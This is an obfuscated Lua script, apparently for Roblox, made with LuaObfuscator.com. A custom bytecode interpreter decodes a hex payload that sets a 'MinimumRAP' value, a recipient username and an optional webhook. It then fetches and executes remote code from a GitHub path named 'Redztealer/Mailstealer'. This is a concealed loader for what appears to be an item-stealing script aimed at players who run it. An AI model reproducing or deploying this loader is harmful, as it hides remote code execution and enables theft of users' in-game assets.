--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33) if v33 then local v84=(v31/(2^(v32-1)))%((5 -3)^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -(1 + 0)))) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(34 + 180 + 713))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24() local v34,v35,v36,v37=v1(v16,v19,v19 + (880 -(282 + 595)) );v19=v19 + (1641 -(1523 + (1384 -(226 + 1044)))) ;return (v37 * (15077001 + 1700215)) + (v36 * (93426 -27890)) + (v35 * (1321 -(68 + 997))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29() local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==(0 + 0)) then local v91=1474 -(1329 + 145) ;while true do if (v91==(972 -(140 + 831))) then v38=1;break;end if (v91==0) then v39=0;v40=nil;v91=1851 -(1409 + 441) ;end end end if (v38==(720 -(15 + 703))) then v43=nil;v44=nil;v38=2 + 1 ;end if (v38==(441 -(262 + 176))) then v45=nil;v46=nil;v38=1725 -(345 + 1376) ;end if (v38==1) then local v92=0;while true do if (v92==1) then v38=2;break;end if (v92==(688 -(198 + 490))) then v41=nil;v42=nil;v92=1;end end end if (v38~=4) then else while true do if (1==v39) then v42=nil;v43=nil;v39=2;end if (v39==0) then local v101=0 -0 ;local v102;while true do if (0==v101) then v102=0;while true do if (v102==1) then v39=1;break;end if (v102==0) then local v134=0 -0 ;while true do if ((1206 -(696 + 510))==v134) then v40=0 -0 ;v41=nil;v134=1;end if (v134==(1263 -(1091 + 171))) then v102=1 + 0 ;break;end end end end break;end end end if ((9 -6)~=v39) then else v46=nil;while true do local v103=0;local v104;local v105;while true do if (v103==(3 -2)) then while true do if (v104==0) then v105=0;while true do if (v105==(374 -(123 + 251))) then local v160=0 -0 ;local v161;while true do if (v160==0) then v161=698 -(208 + 490) ;while true do if (v161==1) then v105=1;break;end if (v161~=(0 + 0)) then else if (v40==(1 + 1)) then local v170=836 -(660 + 176) ;local v171;while true do if (v170==0) then v171=0;while true do if (v171==(1 + 0)) then for v181=1,v24() do local v182=0;local v183;local v184;local v185;while true do if (v182==(203 -(14 + 188))) then v185=nil;while true do if (v183~=(676 -(534 + 141))) then else while true do if (v184==0) then v185=v22();if (v21(v185,1,1 + 0 )~=0) then else local v193=0;local v194;local v195;local v196;local v197;while true do if (v193~=0) then else v194=0;v195=nil;v193=1 + 0 ;end if ((1 + 0)~=v193) then else v196=nil;v197=nil;v193=3 -1 ;end if (v193==(2 -0)) then while true do if (v194==(5 -3)) then local v199=0 + 0 ;while true do if (v199==(0 + 0)) then local v207=0;while true do if (v207~=1) then else v199=1;break;end if (v207==(396 -(115 + 281))) then if (v21(v196,2 -1 ,1 + 0 )~=1) then else v197[2]=v46[v197[2]];end if (v21(v196,2,4 -2 )~=(3 -2)) then else v197[870 -(550 + 317) ]=v46[v197[3]];end v207=1;end end end if (v199~=1) then else v194=3;break;end end end if ((1 -0)==v194) then v197={v23(),v23(),nil,nil};if (v195==0) then local v202=0;local v203;local v204;while true do if (v202==(1665 -(970 + 695))) then v203=0;v204=nil;v202=1 -0 ;end if (v202==1) then while true do if (v203==(1990 -(582 + 1408))) then v204=0 -0 ;while true do if (v204==0) then v197[3]=v23();v197[4]=v23();break;end end break;end end break;end end elseif (v195==(1 -0)) then v197[11 -8 ]=v24();elseif (v195==2) then v197[3]=v24() -((1826 -(1195 + 629))^16) ;elseif (v195==(3 -0)) then local v214=0;local v215;while true do if (v214==0) then v215=241 -(187 + 54) ;while true do if (0==v215) then v197[783 -(162 + 618) ]=v24() -((2 + 0)^16) ;v197[4]=v23();break;end end break;end end end v194=2;end if (v194==0) then local v200=0;while true do if ((1 + 0)~=v200) then else v194=1 -0 ;break;end if (v200==0) then v195=v21(v185,2,4 -1 );v196=v21(v185,4,1 + 5 );v200=1;end end end if (v194==3) then if (v21(v196,1639 -(1373 + 263) ,1003 -(451 + 549) )==1) then v197[2 + 2 ]=v46[v197[5 -1 ]];end v41[v181]=v197;break;end end break;end end end break;end end break;end if (v183~=(0 -0)) then else v184=0;v185=nil;v183=1385 -(746 + 638) ;end end break;end if (v182~=(0 + 0)) then else v183=0;v184=nil;v182=1;end end end v40=4 -1 ;break;end if (v171~=0) then else local v178=341 -(218 + 123) ;local v179;while true do if ((1581 -(1535 + 46))~=v178) then else v179=0;while true do if (v179==0) then local v186=0;while true do if (0==v186) then for v188=1 + 0 ,v45 do local v189=0;local v190;local v191;local v192;while true do if (v189~=(1 + 0)) then else v192=nil;while true do if (v190~=0) then else v191=v22();v192=nil;v190=561 -(306 + 254) ;end if (v190==1) then if (v191==1) then v192=v22()~=(0 + 0) ;elseif (v191==2) then v192=v25();elseif (v191~=(5 -2)) then else v192=v26();end v46[v188]=v192;break;end end break;end if (v189~=(1467 -(899 + 568))) then else v190=0;v191=nil;v189=1 + 0 ;end end end v44[3]=v22();v186=1;end if (v186~=1) then else v179=2 -1 ;break;end end end if (v179~=(604 -(268 + 335))) then else v171=1;break;end end break;end end end end break;end end end if (v40==1) then local v172=0;local v173;while true do if (0~=v172) then else v173=290 -(60 + 230) ;while true do if (v173==1) then v46={};v40=574 -(426 + 146) ;break;end if (v173==(0 + 0)) then local v180=1456 -(282 + 1174) ;while true do if (v180~=1) then else v173=1;break;end if (v180==0) then v44={v41,v42,nil,v43};v45=v24();v180=1 + 0 ;end end end end break;end end end v161=1025 -(706 + 318) ;end end break;end end end if (v105==(1252 -(721 + 530))) then if (v40==(1271 -(945 + 326))) then local v166=0 -0 ;local v167;while true do if (v166==(0 + 0)) then v167=700 -(271 + 429) ;while true do if (0==v167) then local v174=0 + 0 ;while true do if (v174~=(1501 -(1408 + 92))) then else v167=1;break;end if (v174~=(1086 -(461 + 625))) then else v41={};v42={};v174=1;end end end if ((1289 -(993 + 295))==v167) then v43={};v40=1;break;end end break;end end end if (v40~=(1 + 2)) then else local v168=0;local v169;while true do if ((1171 -(418 + 753))==v168) then v169=0;while true do if ((0 + 0)==v169) then local v175=0 + 0 ;while true do if (v175==0) then for v176=1,v24() do v42[v176-1 ]=v29();end return v44;end end end end break;end end end break;end end break;end end break;end if (v103~=(0 + 0)) then else v104=0 + 0 ;v105=nil;v103=530 -(406 + 123) ;end end end break;end if (v39==2) then v44=nil;v45=nil;v39=3;end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25() local v47=(0 -0) + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(1771 -(1749 + 20))) then v52=v21(v49,(1593 -(1126 + 425)) -21 ,8 + 23 );v53=((v21(v49,1354 -((1654 -(118 + 287)) + 73) )==(1 + 0)) and  -(1146 -((1826 -1360) + 679))) or (2 -1) ;v47=3;end if (v47==0) then v48=v24();v49=v24();v47=2 -1 ;end if ((8 -5)==v47) then if (v52==(320 -(53 + 267))) then if (v51==(1900 -(106 + 1794))) then return v53 * (0 + 0) ;else v52=1 + 0 ;v50=0 -0 ;end elseif (v52==(5542 -(4616 -(118 + 1003)))) then return ((v51==(114 -(4 + 110))) and (v53 * (((1711 -1126) -(57 + 527))/(1427 -(41 + 1386))))) or (v53 * NaN) ;end return v8(v53,v52-(1126 -(17 + 86)) ) * (v50 + (v51/((2 + 0)^(115 -63)))) ;end if (v47==(739 -(542 + (573 -(142 + 235))))) then v50=2 -(4 -3) ;v51=(v21(v49,167 -(122 + 44) ,11 + 9 ) * ((2 -(0 + 0))^(105 -73))) + v48 ;v47=4 -2 ;end end end v26=nil;function v26(v54) local v55=977 -(553 + 424) ;local v56;local v57;while true do if (v55==(3 -1)) then v57={};for v93=1 + 0 , #v56 do v57[v93]=v2(v1(v3(v56,v93,v93)));end v55=3 + 0 + 0 ;end if ((1 + 0)==v55) then v56=v3(v16,v19,(v19 + v54) -(1 + (0 -0)) );v19=v19 + v54 ;v55=2 + 0 ;end if ((0 -(753 -(239 + 514)))==v55) then v56=nil;if  not v54 then v54=v24();if (v54==(0 -(0 + 0))) then return "";end end v55=2 -1 ;end if (v55==3) then return v6(v57);end end end v18=5;end if (v18==2) then function v22() local v58=1329 -(797 + 532) ;local v59;while true do if (0==v58) then v59=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v58=(1203 -(373 + 829)) + 0 ;end if (v58==(2 -(732 -(476 + 255)))) then return v59;end end end v23=nil;function v23() local v60=1130 -(369 + 761) ;local v61;local v62;while true do if (v60==(0 + 0)) then v61,v62=v1(v16,v19,v19 + (2 -0) );v19=v19 + (3 -1) ;v60=239 -(64 + 174) ;end if ((1 + 0)==v60) then return (v62 * ((714 -(144 + 192)) -122)) + v61 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63) if (v1(v63,2)==79) then local v86=0;while true do if (0==v86) then v20=v0(v3(v63,1,1));return "";end end else local v87=v2(v0(v63,16));if v20 then local v95=0;local v96;while true do if (v95==0) then v96=v5(v87,v20);v20=nil;v95=1;end if (v95==1) then return v96;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66) local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...) local v70=v67;local v71=v68;local v72=v69;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=5) then if (v83<=2) then if (v83<=0) then v74=v82[3];elseif (v83==1) then local v107=v82[2];local v108=v80[v82[3]];v80[v107 + 1 ]=v108;v80[v107]=v108[v82[4]];else local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==0) then v113=v82[2];v114,v115=v73(v80[v113](v13(v80,v113 + 1 ,v82[3])));v112=1;end if (v112==2) then for v156=v113,v75 do local v157=0;while true do if (v157==0) then v116=v116 + 1 ;v80[v156]=v114[v116];break;end end end break;end if (v112==1) then v75=(v115 + v113) -1 ;v116=0;v112=2;end end end elseif (v83<=3) then v80[v82[2]]();elseif (v83>4) then local v117=v82[2];v80[v117]=v80[v117](v13(v80,v117 + 1 ,v75));else local v119=0;local v120;local v121;local v122;local v123;local v124;while true do if (v119==5) then v80[v124]=v80[v124](v13(v80,v124 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v119=6;end if (v119==4) then v75=(v122 + v124) -1 ;v120=0;for v158=v124,v75 do local v159=0;while true do if (v159==0) then v120=v120 + 1 ;v80[v158]=v121[v120];break;end end end v74=v74 + 1 ;v82=v70[v74];v124=v82[2];v119=5;end if (v119==3) then v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v124=v82[2];v121,v122=v73(v80[v124](v13(v80,v124 + 1 ,v82[3])));v119=4;end if (v119==2) then v82=v70[v74];v124=v82[2];v123=v80[v82[3]];v80[v124 + 1 ]=v123;v80[v124]=v123[v82[4]];v74=v74 + 1 ;v119=3;end if (v119==6) then v74=v82[3];break;end if (v119==0) then v120=nil;v121,v122=nil;v123=nil;v124=nil;v66[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v119=1;end if (v119==1) then v82=v70[v74];v80[v82[2]]=v66[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v66[v82[3]];v74=v74 + 1 ;v119=2;end end end elseif (v83<=8) then if (v83<=6) then do return;end elseif (v83==7) then v80[v82[2]]=v82[3];else for v132=v82[2],v82[3] do v80[v132]=nil;end end elseif (v83<=9) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83>10) then v80[v82[2]]=v66[v82[3]];else v66[v82[3]]=v80[v82[2]];end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F030A3O004D696E696D756D524150024O00D0125341030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5265647A7465616C65722F4D61696C737465616C65722F6D61696E2F5265647A563503083O00557365726E616D6503123O004558414D504C45555345524E414D4531323303073O00576562682O6F6B03103O0054484953204953204F5054494F4E414C00243O0012073O00014O0008000100013O0026093O00020001000100044O00020001001207000100013O002609000100110001000200044O00110001001207000200043O001204000200033O00122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O00230001002609000100050001000100044O00050001001207000200013O0026090002001B0001000100044O001B00010012070003000A3O00120A000300093O0012070003000C3O00120A0003000B3O001207000200023O002609000200140001000200044O00140001001207000100023O00044O0005000100044O0014000100044O0005000100044O0023000100044O000200012O00063O00017O00",v9(),...);
